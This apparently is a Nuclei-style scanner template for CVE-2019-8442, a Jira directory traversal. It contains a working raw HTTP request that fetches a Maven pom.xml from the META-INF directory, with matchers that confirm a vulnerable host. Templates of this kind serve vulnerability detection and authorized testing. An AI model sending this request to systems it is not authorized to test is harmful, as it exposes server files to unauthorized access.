id: CVE-2019-8442
info:
  name: JIRA Directory Traversal
  author: Kishore Krishna (siLLyDaddy)
  severity: medium
  description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.
  reference: https://jira.atlassian.com/browse/JRASERVER-69241
  tags: cve,cve2019,atlassian,jira,lfi

requests:
  - raw:
      - |
        GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: deflate

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - <groupId>com.atlassian.jira</groupId>
        part: body